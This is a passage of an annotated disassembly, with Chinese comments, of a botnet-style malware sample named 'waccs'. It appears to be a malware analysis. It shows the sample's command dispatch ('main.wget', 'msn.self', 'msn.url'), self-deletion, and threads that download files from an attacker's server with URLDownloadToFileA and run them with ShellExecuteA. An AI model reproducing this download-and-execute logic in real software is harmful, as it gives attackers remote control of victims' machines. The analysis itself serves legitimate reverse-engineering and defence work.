CALL waccs.00401F5E ; 清除内存数据. 004019CE FF15 E8814000 CALL DWORD PTR DS:[4081E8] ; WS2_32.WSACleanup(清除WinSock库函数). 004019D4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004019D7 FFB0 0C010000 PUSH DWORD PTR DS:[EAX+10C] 004019DD FF15 74804000 CALL DWORD PTR DS:[408074] ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体). 004019E3 6A 00 PUSH 0 004019E5 E8 86270000 CALL waccs.00404170 ; 删除病毒在注册表中的启动项. 004019EA 59 POP ECX 004019EB E8 1D260000 CALL waccs.0040400D ; 主病毒体程序文件执行自我删除. 004019F0 EB 60 JMP SHORT waccs.00401A52 004019F2 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004019F5 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C] 004019FC 68 843DBF83 PUSH 83BF3D84 00401A01 8D8D 80F4FFFF LEA ECX,DWORD PTR SS:[EBP-B80] 00401A07 E8 0A100000 CALL waccs.00402A16 ; ASCII "msn.stop" 00401A0C 50 PUSH EAX 00401A0D E8 90560000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.stop"). 00401A12 59 POP ECX 00401A13 59 POP ECX 00401A14 F7D8 NEG EAX 00401A16 1BC0 SBB EAX,EAX 00401A18 40 INC EAX 00401A19 8885 8CF4FFFF MOV BYTE PTR SS:[EBP-B74],AL 00401A1F 8D8D 80F4FFFF LEA ECX,DWORD PTR SS:[EBP-B80] 00401A25 E8 9C060000 CALL waccs.004020C6 ; 清除内存数据. 00401A2A 0FB685 8CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B74] 00401A31 85C0 TEST EAX,EAX 00401A33 74 1D JE SHORT waccs.00401A52 ; 判断. 00401A35 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401A38 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0 00401A3F 74 11 JE SHORT waccs.00401A52 ; 判断. 00401A41 6A 00 PUSH 0 00401A43 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401A46 FFB0 10010000 PUSH DWORD PTR DS:[EAX+110] 00401A4C FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread(结束线程). 00401A52 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401A55 83BC85 68FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-198],0 00401A5D 75 05 JNZ SHORT waccs.00401A64 00401A5F E9 2F040000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401A64 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401A67 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C] 00401A6E 68 C2143DAE PUSH AE3D14C2 00401A73 8D8D 70F4FFFF LEA ECX,DWORD PTR SS:[EBP-B90] 00401A79 E8 F80F0000 CALL waccs.00402A76 ; ASCII "main.wget" 00401A7E 50 PUSH EAX 00401A7F E8 1E560000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"main.wget"). 00401A84 59 POP ECX 00401A85 59 POP ECX 00401A86 F7D8 NEG EAX 00401A88 1BC0 SBB EAX,EAX 00401A8A 40 INC EAX 00401A8B 8885 7CF4FFFF MOV BYTE PTR SS:[EBP-B84],AL 00401A91 8D8D 70F4FFFF LEA ECX,DWORD PTR SS:[EBP-B90] 00401A97 E8 52060000 CALL waccs.004020EE ; 清除内存数据. 00401A9C 0FB685 7CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B84] 00401AA3 85C0 TEST EAX,EAX 00401AA5 74 78 JE SHORT waccs.00401B1F ; 判断是否该执行"main.wget"命令. 00401AA7 80A5 58FDFFFF 0>AND BYTE PTR SS:[EBP-2A8],0 00401AAE 68 04010000 PUSH 104 00401AB3 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401AB6 FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-198] 00401ABD 8D85 59FDFFFF LEA EAX,DWORD PTR SS:[EBP-2A7] 00401AC3 50 PUSH EAX 00401AC4 E8 D3550000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401AC9 83C4 0C ADD ESP,0C 00401ACC 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401ACF 8985 60FEFFFF MOV DWORD PTR SS:[EBP-1A0],EAX 00401AD5 8D85 58FDFFFF LEA EAX,DWORD PTR SS:[EBP-2A8] 00401ADB 50 PUSH EAX 00401ADC 6A 00 PUSH 0 00401ADE 68 143A4000 PUSH waccs.00403A14 00401AE3 E8 AE550000 CALL waccs.00407096 ; JMP 到 msvcrt._beginthread(创建一个子线程,线程执行函数地址为:00403A14).(线程功能:下载骇客指定远程服务器站点的其它程序,并自动调用运行). 00401AE8 83C4 0C ADD ESP,0C 00401AEB 83A5 54FDFFFF 0>AND DWORD PTR SS:[EBP-2AC],0 00401AF2 EB 0D JMP SHORT waccs.00401B01 00401AF4 8B85 54FDFFFF MOV EAX,DWORD PTR SS:[EBP-2AC] 00401AFA 40 INC EAX 00401AFB 8985 54FDFFFF MOV DWORD PTR SS:[EBP-2AC],EAX 00401B01 0FB685 58FDFFFF MOVZX EAX,BYTE PTR SS:[EBP-2A8] 00401B08 85C0 TEST EAX,EAX 00401B0A 75 13 JNZ SHORT waccs.00401B1F 00401B0C 83BD 54FDFFFF 5>CMP DWORD PTR SS:[EBP-2AC],50 00401B13 7D 0A JGE SHORT waccs.00401B1F 00401B15 6A 19 PUSH 19 00401B17 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待). 00401B1D ^ EB D5 JMP SHORT waccs.00401AF4 00401B1F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401B22 83BC85 70FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-190],0 00401B2A 75 05 JNZ SHORT waccs.00401B31 00401B2C E9 62030000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401B31 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401B34 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C] 00401B3B 68 4378F788 PUSH 88F77843 00401B40 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0] 00401B46 E8 8B0F0000 CALL waccs.00402AD6 ; ASCII "msn.self" 00401B4B 50 PUSH EAX 00401B4C E8 51550000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.self"). 00401B51 59 POP ECX 00401B52 59 POP ECX 00401B53 F7D8 NEG EAX 00401B55 1BC0 SBB EAX,EAX 00401B57 40 INC EAX 00401B58 8885 6CF4FFFF MOV BYTE PTR SS:[EBP-B94],AL 00401B5E 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0] 00401B64 E8 5D050000 CALL waccs.004020C6 ; 清除内存数据. 00401B69 0FB685 6CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B94] 00401B70 85C0 TEST EAX,EAX 00401B72 0F84 52010000 JE waccs.00401CCA ; 判断是否该执行"msn.self"命令. 00401B78 68 20040000 PUSH 420 00401B7D 6A 00 PUSH 0 00401B7F 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC] 00401B85 50 PUSH EAX 00401B86 E8 AF540000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401B8B 83C4 0C ADD ESP,0C 00401B8E 80A5 34F9FFFF 0>AND BYTE PTR SS:[EBP-6CC],0 00401B95 68 04010000 PUSH 104 00401B9A 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401B9D FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-198] 00401BA4 8D85 41FCFFFF LEA EAX,DWORD PTR SS:[EBP-3BF] 00401BAA 50 PUSH EAX 00401BAB E8 EC540000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401BB0 83C4 0C ADD ESP,0C 00401BB3 68 04010000 PUSH 104 00401BB8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BBB FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-194] 00401BC2 8D85 39FAFFFF LEA EAX,DWORD PTR SS:[EBP-5C7] 00401BC8 50 PUSH EAX 00401BC9 E8 CE540000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401BCE 83C4 0C ADD ESP,0C 00401BD1 68 04010000 PUSH 104 00401BD6 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BD9 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-190] 00401BE0 8D85 3DFBFFFF LEA EAX,DWORD PTR SS:[EBP-4C3] 00401BE6 50 PUSH EAX 00401BE7 E8 B0540000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401BEC 83C4 0C ADD ESP,0C 00401BEF 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BF2 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-18C],0 00401BFA 74 41 JE SHORT waccs.00401C3D 00401BFC 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BFF 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-188],0 00401C07 74 34 JE SHORT waccs.00401C3D 00401C09 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401C0C FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-18C] 00401C13 E8 78540000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401C18 59 POP ECX 00401C19 8985 48FDFFFF MOV DWORD PTR SS:[EBP-2B8],EAX 00401C1F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401C22 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-188] 00401C29 E8 62540000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401C2E 59 POP ECX 00401C2F 69C0 60EA0000 IMUL EAX,EAX,0EA60 00401C35 8985 4CFDFFFF MOV DWORD PTR SS:[EBP-2B4],EAX 00401C3B EB 14 JMP SHORT waccs.00401C51 00401C3D C785 48FDFFFF 0>MOV DWORD PTR SS:[EBP-2B8],1 00401C47 C785 4CFDFFFF F>MOV DWORD PTR SS:[EBP-2B4],0FA 00401C51 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401C54 8985 50FDFFFF MOV DWORD PTR SS:[EBP-2B0],EAX 00401C5A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401C5D 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0 00401C64 74 11 JE SHORT waccs.00401C77 00401C66 6A 00 PUSH 0 00401C68 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401C6B FFB0 10010000 PUSH DWORD PTR DS:[EAX+110] 00401C71 FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread(结束线程). 00401C77 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC] 00401C7D 50 PUSH EAX 00401C7E 6A 00 PUSH 0 00401C80 68 FE4C4000 PUSH waccs.00404CFE 00401C85 E8 0C540000 CALL waccs.00407096 ; JMP 到 msvcrt._beginthread(创建一个子线程,线程执行函数地址为:00404CFE).(线程功能:建立连接,访问远程网站信息,下载和删除指定文件等操作). 00401C8A 83C4 0C ADD ESP,0C 00401C8D 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 00401C90 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX 00401C96 83A5 30F9FFFF 0>AND DWORD PTR SS:[EBP-6D0],0 00401C9D EB 0D JMP SHORT waccs.00401CAC 00401C9F 8B85 30F9FFFF MOV EAX,DWORD PTR SS:[EBP-6D0] 00401CA5 40 INC EAX 00401CA6 8985 30F9FFFF MOV DWORD PTR SS:[EBP-6D0],EAX 00401CAC 0FB685 34F9FFFF MOVZX EAX,BYTE PTR SS:[EBP-6CC] 00401CB3 85C0 TEST EAX,EAX 00401CB5 75 13 JNZ SHORT waccs.00401CCA 00401CB7 83BD 30F9FFFF 5>CMP DWORD PTR SS:[EBP-6D0],50 00401CBE 7D 0A JGE SHORT waccs.00401CCA 00401CC0 6A 19 PUSH 19 00401CC2 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待). 00401CC8 ^ EB D5 JMP SHORT waccs.00401C9F 00401CCA 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401CCD 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-18C],0 00401CD5 75 05 JNZ SHORT waccs.00401CDC 00401CD7 E9 B7010000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401CDC 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401CDF FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-19C] 00401CE6 68 D7A57E24 PUSH 247EA5D7 00401CEB 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC] 00401CF1 E8 400E0000 CALL waccs.00402B36 ; ASCII "msn.url" 00401CF6 50 PUSH EAX 00401CF7 E8 A6530000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.url"). 00401CFC 59 POP ECX 00401CFD 59 POP ECX 00401CFE F7D8 NEG EAX 00401D00 1BC0 SBB EAX,EAX 00401D02 40 INC EAX 00401D03 8885 5CF4FFFF MOV BYTE PTR SS:[EBP-BA4],AL 00401D09 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC] 00401D0F E8 C2020000 CALL waccs.00401FD6 ; 清除内存数据. 00401D14 0FB685 5CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-BA4] 00401D1B 85C0 TEST EAX,EAX 00401D1D 0F84 70010000 JE waccs.00401E93 ; 判断是否该执行"msn.url"命令. 00401D23 68 20040000 PUSH 420 00401D28 6A 00 PUSH 0 00401D2A 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0] 00401D30 50 PUSH EAX 00401D31 E8 04530000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401D36 83C4 0C ADD ESP,0C 00401D39 80A5 10F5FFFF 0>AND BYTE PTR SS:[EBP-AF0],0 00401D40 68 04010000 PUSH 104 00401D45 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401D48 FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-198] 00401D4F 8D85 1DF8FFFF LEA EAX,DWORD PTR SS:[EBP-7E3] 00401D55 50 PUSH EAX 00401D56 E8 41530000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401D5B 83C4 0C ADD ESP,0C 00401D5E 68 04010000 PUSH 104 00401D63 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401D66 FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-194] 00401D6D 8D85 11F5FFFF LEA EAX,DWORD PTR SS:[EBP-AEF] 00401D73 50 PUSH EAX 00401D74 E8 23530000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401D79 83C4 0C ADD ESP,0C 00401D7C 68 04010000 PUSH 104 00401D81 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401D84 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-190] 00401D8B 8D85 15F6FFFF LEA EAX,DWORD PTR SS:[EBP-9EB] 00401D91 50 PUSH EAX 00401D92 E8 05530000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401D97 83C4 0C ADD ESP,0C 00401D9A 68 04010000 PUSH 104 00401D9F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DA2 FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-18C] 00401DA9 8D85 19F7FFFF LEA EAX,DWORD PTR SS:[EBP-8E7] 00401DAF 50 PUSH EAX 00401DB0 E8 E7520000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401DB5 83C4 0C ADD ESP,0C 00401DB8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DBB 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-188],0 00401DC3 74 41 JE SHORT waccs.00401E06 00401DC5 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DC8 83BC85 7CFEFFFF>CMP DWORD PTR SS:[EBP+EAX*4-184],0 00401DD0 74 34 JE SHORT waccs.00401E06 00401DD2 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DD5 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-188] 00401DDC E8 AF520000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401DE1 59 POP ECX 00401DE2 8985 24F9FFFF MOV DWORD PTR SS:[EBP-6DC],EAX 00401DE8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DEB FFB485 7CFEFFFF PUSH DWORD PTR SS:[EBP+EAX*4-184] 00401DF2 E8 99520000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401DF7 59 POP ECX 00401DF8 69C0 60EA0000 IMUL EAX,EAX,0EA60 00401DFE 8985 28F9FFFF MOV DWORD PTR SS:[EBP-6D8],EAX 00401E04 EB 14 JMP SHORT waccs.00401E1A 00401E06 C785 24F9FFFF 0>MOV DWORD PTR SS:[EBP-6DC],1 00401E10 C785 28F9FFFF F>MOV DWORD PTR SS:[EBP-6D8],0FA 00401E1A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401E1D 8985 2CF9FFFF MOV DWORD PTR SS:[EBP-6D4],EAX 00401E23 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401E26 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0 00401E2D 74 11 JE SHORT waccs.00401E40 00401E2F 6A 00 PUSH 0 00401E31 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401E34 FFB0 10010000 PUSH DWORD PTR DS:[EAX+110] 00401E3A FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread(结束线程). 00401E40 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0] 00401E46 50 PUSH EAX 00401E47 6A 00 PUSH 0 00401E49 68 FE4C4000 PUSH waccs.00404CFE 00401E4E E8 43520000 CALL waccs.00407096 ; JMP 到 msvcrt._beginthread(创建一个子线程,线程执行函数地址为:00404CFE).(线程功能:建立连接,访问远程网站信息,下载和删除指定文件等操作). 00401E53 83C4 0C ADD ESP,0C 00401E56 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 00401E59 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX 00401E5F 83A5 0CF5FFFF 0>AND DWORD PTR SS:[EBP-AF4],0 00401E66 EB 0D JMP SHORT waccs.00401E75 00401E68 8B85 0CF5FFFF MOV EAX,DWORD PTR SS:[EBP-AF4] 00401E6E 40 INC EAX 00401E6F 8985 0CF5FFFF MOV DWORD PTR SS:[EBP-AF4],EAX 00401E75 0FB685 10F5FFFF MOVZX EAX,BYTE PTR SS:[EBP-AF0] 00401E7C 85C0 TEST EAX,EAX 00401E7E 75 13 JNZ SHORT waccs.00401E93 00401E80 83BD 0CF5FFFF 5>CMP DWORD PTR SS:[EBP-AF4],50 00401E87 7D 0A JGE SHORT waccs.00401E93 00401E89 6A 19 PUSH 19 00401E8B FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待). 00401E91 ^ EB D5 JMP SHORT waccs.00401E68 00401E93 5F POP EDI 00401E94 C9 LEAVE 00401E95 C3 RETN ; 返回. 下载骇客指定远程服务器站点的其它程序,并自动调用运行: 00403A14 55 PUSH EBP 00403A15 8BEC MOV EBP,ESP 00403A17 81EC 6C030000 SUB ESP,36C 00403A1D 56 PUSH ESI 00403A1E 57 PUSH EDI 00403A1F 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] 00403A22 6A 43 PUSH 43 00403A24 59 POP ECX 00403A25 8DBD F0FDFFFF LEA EDI,DWORD PTR SS:[EBP-210] 00403A2B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00403A2D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00403A30 8985 E8FCFFFF MOV DWORD PTR SS:[EBP-318],EAX 00403A36 8B85 E8FCFFFF MOV EAX,DWORD PTR SS:[EBP-318] 00403A3C C600 01 MOV BYTE PTR DS:[EAX],1 00403A3F FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00403A45 50 PUSH EAX 00403A46 E8 01360000 CALL waccs.0040704C ; JMP 到 msvcrt.srand 00403A4B 59 POP ECX 00403A4C 68 04010000 PUSH 104 00403A51 6A 00 PUSH 0 00403A53 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403A59 50 PUSH EAX 00403A5A E8 DB350000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00403A5F 83C4 0C ADD ESP,0C 00403A62 68 04010000 PUSH 104 00403A67 6A 00 PUSH 0 00403A69 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314] 00403A6F 50 PUSH EAX 00403A70 E8 C5350000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00403A75 83C4 0C ADD ESP,0C 00403A78 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314] 00403A7E 50 PUSH EAX 00403A7F 68 04010000 PUSH 104 00403A84 FF15 A4804000 CALL DWORD PTR DS:[4080A4] ; kernel32.GetTempPathA 00403A8A E8 B7350000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00403A8F 99 CDQ 00403A90 6A 09 PUSH 9 00403A92 59 POP ECX 00403A93 F7F9 IDIV ECX 00403A95 52 PUSH EDX 00403A96 E8 AB350000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00403A9B 99 CDQ 00403A9C 6A 09 PUSH 9 00403A9E 59 POP ECX 00403A9F F7F9 IDIV ECX 00403AA1 52 PUSH EDX 00403AA2 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314] 00403AA8 50 PUSH EAX 00403AA9 68 D95B0021 PUSH 21005BD9 00403AAE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328] 00403AB4 E8 6C090000 CALL waccs.00404425 00403AB9 50 PUSH EAX 00403ABA 68 04010000 PUSH 104 00403ABF 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403AC5 50 PUSH EAX 00403AC6 E8 75350000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf 00403ACB 83C4 18 ADD ESP,18 00403ACE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328] 00403AD4 E8 9DE5FFFF CALL waccs.00402076 00403AD9 6A 00 PUSH 0 00403ADB 6A 00 PUSH 0 00403ADD 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403AE3 50 PUSH EAX 00403AE4 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F] 00403AEA 50 PUSH EAX 00403AEB 6A 00 PUSH 0 00403AED E8 C2360000 CALL waccs.004071B4 ; JMP 到 urlmon.URLDownloadToFileA 00403AF2 8985 E4FCFFFF MOV DWORD PTR SS:[EBP-31C],EAX 00403AF8 83BD E4FCFFFF 0>CMP DWORD PTR SS:[EBP-31C],0 00403AFF 75 6A JNZ SHORT waccs.00403B6B 00403B01 6A 00 PUSH 0 00403B03 6A 00 PUSH 0 00403B05 6A 00 PUSH 0 00403B07 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403B0D 50 PUSH EAX 00403B0E 68 AC9D4000 PUSH waccs.00409DAC ; ASCII "open" 00403B13 6A 00 PUSH 0 00403B15 FF15 74814000 CALL DWORD PTR DS:[408174] ; SHELL32.ShellExecuteA 00403B1B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403B21 50 PUSH EAX 00403B22 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F] 00403B28 50 PUSH EAX 00403B29 68 B49D4000 PUSH waccs.00409DB4 00403B2E 68 B89D4000 PUSH waccs.00409DB8 00403B33 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108] 00403B39 05 D3000000 ADD EAX,0D3 00403B3E 50 PUSH EAX 00403B3F 68 D32B4F0A PUSH 0A4F2BD3 00403B44 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C] 00403B4A E8 36090000 CALL waccs.00404485 00403B4F 50 PUSH EAX 00403B50 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108] 00403B56 E8 A5D4FFFF CALL waccs.00401000 00403B5B 83C4 1C ADD ESP,1C 00403B5E 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C] 00403B64 E8 FC060000 CALL waccs.00404265 00403B69 EB 40 JMP SHORT waccs.00403BAB 00403B6B 68 E09D4000 PUSH waccs.00409DE0 00403B70 68 E49D4000 PUSH waccs.00409DE4 00403B75 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108] 00403B7B 05 D3000000 ADD EAX,0D3 00403B80 50 PUSH EAX 00403B81 68 4AF075C1 PUSH C175F04A 00403B86 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C] 00403B8C E8 54090000 CALL waccs.004044E5 00403B91 50 PUSH EAX 00403B92 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108] 00403B98 E8 63D4FFFF CALL waccs.00401000 00403B9D 83C4 14 ADD ESP,14 00403BA0 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C] 00403BA6 E8 E2060000 CALL waccs.0040428D 00403BAB 5F POP EDI 00403BAC 5E POP ESI 00403BAD C9 LEAVE 00403BAE C3 RETN ; 返回. 建立连接,访问远程网站信息,下载和删除指定文件等操作: 00404CFE 55 PUSH EBP 00404CFF 8BEC MOV EBP,ESP 00404D01 B8 5C190000 MOV EAX,195C 00404D06 E8 55230000 CALL waccs.00407060 00404D0B 56 PUSH ESI 00404D0C 57 PUSH EDI 00404D0D 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] 00404D10 B9 08010000 MOV ECX,108 00404D15 8DBD 3CE8FFFF LEA EDI,DWORD PTR SS:[EBP-17C4] 00404D1B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00404D1D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00404D20 8985 28E8FFFF MOV DWORD PTR SS:[EBP-17D8],EAX 00404D26 8B85 28E8FFFF MOV EAX,DWORD PTR SS:[EBP-17D8] 00404D2C C600 01 MOV BYTE PTR DS:[EAX],1 00404D2F 83A5 68EEFFFF 0>AND DWORD PTR SS:[EBP-1198],0 00404D36 6A 63 PUSH 63 00404D38 59 POP ECX 00404D39 33C0 XOR EAX,EAX 00404D3B 8DBD 6CEEFFFF LEA EDI,DWORD PTR SS:[EBP-1194] 00404D41 F3:AB REP STOS DWORD PTR ES:[EDI] 00404D43 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004] 00404D49 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX 00404D4F 68 04010000 PUSH 104 00404D54 6A 00 PUSH 0 00404D56 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404D5C 50 PUSH EAX 00404D5D E8 D8220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404D62 83C4 0C ADD ESP,0C 00404D65 68 04010000 PUSH 104 00404D6A 6A 00 PUSH 0 00404D6C 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404D72 50 PUSH EAX 00404D73 E8 C2220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404D78 83C4 0C ADD ESP,0C 00404D7B 68 04010000 PUSH 104 00404D80 6A 00 PUSH 0 00404D82 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404D88 50 PUSH EAX 00404D89 E8 AC220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404D8E 83C4 0C ADD ESP,0C 00404D91 68 90010000 PUSH 190 00404D96 6A 00 PUSH 0 00404D98 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198] 00404D9E 50 PUSH EAX 00404D9F E8 96220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404DA4 83C4 0C ADD ESP,0C 00404DA7 83A5 20E8FFFF 0>AND DWORD PTR SS:[EBP-17E0],0 00404DAE 83A5 30E8FFFF 0>AND DWORD PTR SS:[EBP-17D0],0 00404DB5 83A5 F8EFFFFF 0>AND DWORD PTR SS:[EBP-1008],0 00404DBC 6A 00 PUSH 0 00404DBE 6A 00 PUSH 0 00404DC0 6A 00 PUSH 0 00404DC2 6A 00 PUSH 0 00404DC4 68 40084B19 PUSH 194B0840 00404DC9 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904] 00404DCF E8 A5040000 CALL waccs.00405279 00404DD4 50 PUSH EAX 00404DD5 FF15 B4814000 CALL DWORD PTR DS:[4081B4] ; WININET.InternetOpenA 00404DDB 8985 20E8FFFF MOV DWORD PTR SS:[EBP-17E0],EAX 00404DE1 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904] 00404DE7 E8 C2D1FFFF CALL waccs.00401FAE 00404DEC 83BD 20E8FFFF 0>CMP DWORD PTR SS:[EBP-17E0],0 00404DF3 75 05 JNZ SHORT waccs.00404DFA 00404DF5 E8 AE220000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404DFA 6A 00 PUSH 0 00404DFC 6A 00 PUSH 0 00404DFE 